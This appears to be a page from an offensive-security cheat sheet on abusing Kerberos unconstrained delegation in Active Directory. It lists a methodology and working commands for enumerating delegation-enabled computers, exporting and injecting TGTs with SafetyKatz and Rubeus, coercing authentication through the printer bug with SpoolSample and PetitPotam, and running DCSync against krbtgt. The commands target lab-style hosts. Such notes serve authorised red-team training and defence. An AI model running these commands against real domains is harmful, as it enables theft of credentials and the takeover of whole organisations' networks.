unconstrained-delegation

Methodology

Enumerate computers which have unconstrained delegation enabled (Ignore domain controllers).
Compromise the computer(s) and escalate to admin privileges.
Abuse printer bug or check for high value target tickets in memory.
Capture the TGT of the high value target.
Copy the ticket (remove extra spaces).
Pass the ticket
(OPTIONAL) Dcsync krbtgt.

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerView

Find computers with unconstrained delegation:

Get-DomainComputer -UnConstrained

ActiveDirectory Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Export local TGTs:

SafetyKatz.exe '"sekurlsa::tickets /export"'

Reuse TGTs:

SafetyKatz.exe '"kerberos::ptt ticket.kirbi"'

Rubeus

Monitor the target for the TGT:

Rubeus.exe monitor /targetuser:target$ /interval:5 /nowrap

Abuse printer bug: https://github.com/leechristensen/SpoolSample https://github.com/topotam/PetitPotam

# With SpoolSample
MS-RPRN.exe \\target.contoso.local \\unconstrained.contoso.local

# With PetitPotam
PetitPotam.exe target unconstrained

Pass the ticket:

Rubeus.exe ptt /ticket:doIFsjCCBa6gAwIBBaEDAgEWooI...

Run DCSync after injecting the ticket

SafetyKatz.exe '"lsadump::dcsync /user:us\krbtgt"'
C:\AD\Tools\SharpKatz.exe --Command dcsync --User us\krbtgt --Domain us.techcorp.local --DomainController us-dc.us.techcorp.local

Previousresource-based-constrained NextCross domain attacks

Last updated 3 months ago

hashtagMethodology

hashtagPowershell

hashtagPowerView

hashtagActiveDirectory Module

hashtagBinaries

hashtagSafetyKatz

hashtagRubeus